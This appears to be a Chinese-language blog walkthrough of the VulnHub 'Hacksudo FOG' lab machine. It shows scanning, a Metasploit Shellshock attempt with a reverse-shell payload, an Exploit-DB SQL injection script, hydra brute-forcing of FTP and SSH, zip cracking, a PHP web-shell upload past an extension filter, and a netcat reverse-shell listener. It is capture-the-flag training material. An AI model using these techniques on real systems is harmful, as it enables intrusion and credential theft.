Hacksudo FOG
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.83.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:ec:15:1e 1 60 PCS Systemtechnik GmbH
192.168.56.210 08:00:27:9e:f9:29 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.210.
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.210 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-22 08:48 EST
Nmap scan report for bogon (192.168.56.210)
Host is up (0.000065s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 36857/tcp mountd
| 100005 1,2,3 50706/udp6 mountd
| 100005 1,2,3 59321/udp mountd
| 100005 1,2,3 60853/tcp6 mountd
| 100021 1,3,4 37499/tcp6 nlockmgr
| 100021 1,3,4 42629/tcp nlockmgr
| 100021 1,3,4 44023/udp6 nlockmgr
| 100021 1,3,4 48943/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 90
| Capabilities flags: 63486
| Some Capabilities: LongColumnFlag, Support41Auth, SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSigpipes, ODBCClient, SupportsLoadDataLocal, SupportsTransactions, Speaks41ProtocolNew, InteractiveClient, FoundRows, DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: Xh$tB)D\!/h@EzY.x49^
|_ Auth Plugin Name: mysql_native_password
36857/tcp open mountd 1-3 (RPC #100005)
41031/tcp open mountd 1-3 (RPC #100005)
42629/tcp open nlockmgr 1-4 (RPC #100021)
55275/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:9E:F9:29 (Oracle VirtualBox virtual NIC)
Service Info: Host: hacksudo.hacksudo; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.41 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ftp 192.168.56.210
Connected to 192.168.56.210.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 08:51. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.210:kali): anonymous
331 User anonymous OK. Password required
Password:
530 Login authentication failed
ftp: Login failed
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 0 kbytes.
221 Logout.
看一下这个FTP软件有无漏洞可利用:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit Pure-FTPd
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pure-FTPd - External Authentication Bash Environment Variable Code Injection (Metasploit) | linux/remote/34862.rb
Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (PoC) | linux/dos/20479.pl
Pure-FTPd 1.0.48 - Remote Denial of Service | multiple/dos/49105.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ msfconsole
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v6.2.9-dev ]
+ -- --=[ 2230 exploits - 1177 auxiliary - 398 post ]
+ -- --=[ 867 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Open an interactive Ruby terminal with
irb
msf6 > search pure-ftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/ftp/pureftpd_bash_env_exec
msf6 > use exploit/multi/ftp/pureftpd_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 21 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 192.168.56.210
RHOSTS => 192.168.56.210
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set SRVHOST 192.168.56.206
SRVHOST => 192.168.56.206
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) > run
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] 192.168.56.210:21 - Command Stager progress - 60.24% done (500/830 bytes)
[*] 192.168.56.210:21 - Command Stager progress - 100.60% done (835/830 bytes)
[*] Exploit completed, but no session was created.
msf6 exploit(multi/ftp/pureftpd_bash_env_exec) >
没有成功,暂时先搁置FTP服务。
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ curl http://192.168.56.210/
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link rel="stylesheet" href="style.css">
<title>Hacksudo FOG</title>
</head>
<body style="background-color:black;">
<section>
<video src="smoke.mp4" autoplay muted></video>
<h1>
<span>H</span>
<span>A</span>
<span>C</span>
<span>K</span>
<span>S</span>
<span>U</span>
<span>D</span>
<span>O</span>
<br>
<span>F</span>
<span>O</span>
<span>G</span>
</h1>
<center><marquee><a href="index1.html">FOG TEAM click here </a></marquee></center>
</section>
</body>
</html>
返回页面中有个超级链接index1.html,访问一下它:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ curl http://192.168.56.210/index1.html
<html>
<title>hacksudo-fogTEAM
</title>
<body style="background-color:black;">
<center><h1><font color=white>Hacksudo:FOG-TEAM</font></h1></center>
<img src="fog.jpg" alt="Fog Project" width="1300" height="600"> </body>
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ gobuster dir -u http://192.168.56.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/22 09:06:17 Starting gobuster in directory enumeration mode
===============================================================
/cms (Status: 301) [Size: 314] [--> http://192.168.56.210/cms/]
/fog (Status: 301) [Size: 314] [--> http://192.168.56.210/fog/]
/server-status (Status: 403) [Size: 279]
Progress: 218693 / 220561 (99.15%)===============================================================
2022/11/22 09:08:28 Finished
===============================================================
识别出来/cms目录,访问该目录,从返回页面可以知道目标站点的CMS为:
CMS Made Simple version 2.2.5
查询一下有无相关漏洞?
──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit CMS Made Simple 2.2.5
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
第一个漏洞利用脚本需要首先有用户密码信息,第二个可以利用一下先。
但先扫描一下目标主机有无其他文件:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ gobuster dir -u http://192.168.56.210 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.210
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,txt,html,sh
[+] Timeout: 10s
===============================================================
2022/11/22 20:53:23 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 853]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 0] [--> /fog/index.php]
/index1.html (Status: 200) [Size: 329]
/cms (Status: 301) [Size: 314] [--> http://192.168.56.210/cms/]
/dict.txt (Status: 200) [Size: 1798]
发现了/dict.txt,应该是字典文件,会不会密码字典?下载下来先看一下
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ wget http://192.168.56.210/dict.txt
看起来是密码字典。
接下来试一下前面所查询出来的利用脚本
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable
这是一个Python2的脚本,执行脚本:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ python2 46635.py -u http://192.168.56.210/cms/
Traceback (most recent call last):
File "46635.py", line 12, in <module>
from termcolor import colored
ImportError: No module named termcolor
Kali Linux中的python2没有termcolor模块,将该脚本改造成python3来执行,执行发现又报了一个错:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ python exploit.py -u http://192.168.56.210/cms --crack -w dict.txt
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
[*] Try: hacker
Traceback (most recent call last):
File "/home/kali/Vulnhub/Hacksudo_FOG/exploit.py", line 184, in <module>
crack_password()
File "/home/kali/Vulnhub/Hacksudo_FOG/exploit.py", line 56, in crack_password
if hashlib.md5(str(salt) + line).hexdigest() == password:
TypeError: Strings must be encoded before hashing
看来用户名已经找到了,加密后的密码也已经找到,接下去是要破解密码,再修改一下代码,用utf-8编码后再做hash:
再次执行,这次没有出错,但是并没有爆破出来密码:
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
至此不知道往下如何办了,看了其他人的做法,这个字典文件是用于FTP的,而且猜测hacksudo这个用户名也同时是FTP的用户名,难怪一直不能破解成功!
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ hydra -l hacksudo -P dict.txt ftp://192.168.56.210
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 21:43:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 196 login tries (l:1/p:196), ~13 tries per task
[DATA] attacking ftp://192.168.56.210:21/
[21][ftp] host: 192.168.56.210 login: hacksudo password: hackme
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ftp 192.168.56.210
Connected to 192.168.56.210.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 21:43. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (192.168.56.210:kali): hacksudo
331 User hacksudo OK. Password required
Password:
230 OK. Current directory is /
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Extended Passive mode OK (|||6456|)
150 Accepted data connection
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 33 33 389 May 7 2021 flag1.txt
drwxr-xr-x 2 0 0 4096 May 6 2021 hacksudo_ISRO_bak
226-Options: -a -l
226 4 matches total
ftp> get hacksudo_ISRO_bak
local: hacksudo_ISRO_bak remote: hacksudo_ISRO_bak
229 Extended Passive mode OK (|||65479|)
550 I can only retrieve regular files
ftp> get flag1.txt
local: flag1.txt remote: flag1.txt
229 Extended Passive mode OK (|||54066|)
150 Accepted data connection
100% |*********************************************************************************| 389 675.94 KiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 0.64 Mbytes per second
389 bytes received in 00:00 (628.94 KiB/s)
ftp> cd hacksudo_ISRO_bak
250 OK. Current directory is /hacksudo_ISRO_bak
ftp> ls -alh
229 Extended Passive mode OK (|||5935|)
150 Accepted data connection
drwxr-xr-x 2 0 0 4096 May 6 2021 .
drwxr-xr-x 3 1002 ftpgroup 4096 May 7 2021 ..
-rw-r--r-- 1 0 0 63 May 5 2021 authors.txt
-rw-r--r-- 1 0 0 0 May 6 2021 installfog
-rw-r--r-- 1 0 0 1573833 May 6 2021 secr3tSteg.zip
226-Options: -a -l
226 5 matches total
ftp> get authors.txt
local: authors.txt remote: authors.txt
229 Extended Passive mode OK (|||57754|)
150 Accepted data connection
100% |*********************************************************************************| 63 98.75 KiB/s 00:00 ETA
226-File successfully transferred
226 0.001 seconds (measured here), 101.87 Kbytes per second
63 bytes received in 00:00 (91.14 KiB/s)
ftp> get installfog
local: installfog remote: installfog
229 Extended Passive mode OK (|||46179|)
150 Accepted data connection
0 0.00 KiB/s
226 File successfully transferred
ftp> get secr3tSteg.zip
local: secr3tSteg.zip remote: secr3tSteg.zip
229 Extended Passive mode OK (|||11902|)
150-Accepted data connection
150 1536.9 kbytes to download
100% |*********************************************************************************| 1536 KiB 139.45 MiB/s 00:00 ETA
226-File successfully transferred
226 0.010 seconds (measured here), 155.05 Mbytes per second
1573833 bytes received in 00:00 (137.17 MiB/s)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1538 kbytes.
221 Logout.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
拿到了第一个flag.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat installfog
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat authors.txt
hacksudo CEO & Founder = vishal waghmare <vishal@hacksudo.com>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ unzip secr3tSteg.zip
Archive: secr3tSteg.zip
[secr3tSteg.zip] hacksudoSTEGNO.wav password:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ zip2john secr3tSteg.zip > zip_hashes
ver 2.0 efh 5455 efh 7875 secr3tSteg.zip/hacksudoSTEGNO.wav PKZIP Encr: TS_chk, cmplen=1573432, decmplen=1965596, crc=8B4A9445 ts=9A86 cs=9a86 type=8
ver 1.0 efh 5455 efh 7875 ** 2b ** secr3tSteg.zip/secr3t.txt PKZIP Encr: TS_chk, cmplen=35, decmplen=23, crc=DD73D9B0 ts=9AB0 cs=9ab0 type=0
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ls
46635.py exploit.py fog.webp my_password_crack.py smoke.mp4 sql_exploit.py
authors.txt flag1.txt hashes nmap_full_scan SoundStegno-main zip_hashes
dict.txt fog.jpg installfog secr3tSteg.zip SoundStegno-main.zip
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ john zip_hashes /usr/share/wordlists/rockyou.txt
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
fooled (secr3tSteg.zip)
1g 0:00:00:00 DONE 2/3 (2022-11-22 21:47) 12.50g/s 2750Kp/s 2750Kc/s 2750KC/s Sportses..vikramed
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解出来了secr3tSteg.zip文件的密码。
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ unzip secr3tSteg.zip
Archive: secr3tSteg.zip
[secr3tSteg.zip] hacksudoSTEGNO.wav password:
inflating: hacksudoSTEGNO.wav
extracting: secr3t.txt
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ls
46635.py exploit.py fog.webp installfog secr3tSteg.zip SoundStegno-main zip_hashes
authors.txt flag1.txt hacksudoSTEGNO.wav my_password_crack.py secr3t.txt SoundStegno-main.zip
dict.txt fog.jpg hashes nmap_full_scan smoke.mp4 sql_exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ cat secr3t.txt
localhost = server IP
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG/SoundStegno-main]
└─$ python ExWave.py -f ../hacksudoSTEGNO.wav _ _ _ _ _ __ __
| || (_)__| |__| |___ _ _ \ \ / /_ ___ _____
| __ | / _` / _` / -_) ' \ \ \/\/ / _` \ V / -_)
|_||_|_\__,_\__,_\___|_||_|_\_/\_/\__,_|\_/\___|
|___|v1.0 www.techchip.net
Visit for more tutorials : www.youtube.com/techchipnet
Hide your text message in wave audio file like MR.ROBOT
Please wait...
Your Secret Message is: Shift by 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
在http://192.168.56.210/index1.html提到了凯撒密码,所以这里用在线网站解密(位移是3位)(https://www.qqxiuzi.cn/bianma/kaisamima.php)
解密后得到:
wwww.localhost/fog Username=fog:password=hacksudoISRO,用这个密码再登录一下CMS
可以成功登录,然后试一下远程执行漏洞代码,执行失败。
还是看一下有无可以上传shell.php入口,发现有过滤,尝试扩展名.phtml,发现可以成功上传
访问该页面:
成功拿到了shell
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.210] 33112
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
22:05:35 up 1:21, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/$ ls
ls
bin ftphome lib lost+found proc srv usr
boot home lib32 media root sys var
dev initrd.img lib64 mnt run tftpboot.prev vmlinuz
etc initrd.img.old libx32 opt sbin tmp vmlinuz.old
www-data@hacksudo:/$ cd /home
cd /home
www-data@hacksudo:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K May 8 2021 .
drwxr-xr-x 20 root root 4.0K May 9 2021 ..
drwxr-xr-x 3 root root 4.0K May 7 2021 backups
drwxr-xr-x 2 root root 4.0K May 8 2021 fogDBbackups
drwxr-x--- 4 1001 1001 4.0K May 6 2021 fogproject
drwxr-x--- 5 isro isro 4.0K May 13 2021 isro
www-data@hacksudo:/home$
www-data@hacksudo:/var/www$ ls
ls
flag2.txt html
www-data@hacksudo:/var/www$ cat flag2.txt
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
www-data@hacksudo:/var/www$
提权
发现look有SUID位
www-data@hacksudo:/var/www$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/mount.nfs
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/look
/usr/bin/mount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/su
/usr/bin/passwd
www-data@hacksudo:/var/www$
也可以直接爆破isro用户的密码,很快就破解出来了
─(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ hydra -l isro -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.210
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-22 22:10:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.56.210:22/
[22][ssh] host: 192.168.56.210 login: isro password: qwerty
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-22 22:10:49
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_FOG]
└─$ ssh isro@192.168.56.210
The authenticity of host '192.168.56.210 (192.168.56.210)' can't be established.
ED25519 key fingerprint is SHA256:FfPfu4QjjjHuWE3UZ3+9fKmCs9MSH7JibTk2QXKelwc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.210' (ED25519) to the list of known hosts.
isro@192.168.56.210's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May 13 07:25:51 2021 from 192.168.43.217
isro@hacksudo:~$ id
uid=1003(isro) gid=1003(isro) groups=1003(isro)
isro@hacksudo:~$ sudo -l
[sudo] password for isro:
Matching Defaults entries for isro on hacksudo:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User isro may run the following commands on hacksudo:
(root) /usr/bin/ls /home/isro/*
isro@hacksudo:~$
isro@hacksudo:~$ cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
isro@hacksudo:~/fog$ ls -alh
total 3.7M
drwxr-xr-x 2 isro isro 4.0K May 13 2021 .
drwxr-x--- 5 isro isro 4.0K May 13 2021 ..
-rwxr-xr-x 1 root isro 17K May 12 2021 fog
-rw-r--r-- 1 isro isro 0 May 6 2021 get
-rwxr-xr-x 1 isro isro 68K May 6 2021 ping
-rwxr-xr-x 1 isro isro 3.6M May 6 2021 python
isro@hacksudo:~/fog$
fog程序可以拿到root权限,strings fog, 发现会执行python
┌──(root
标签:__,Hacksudo,kali,192.168,hacksudo,FOG,Vulnhub,root
From: https://www.cnblogs.com/jason-huawen/p/16917715.html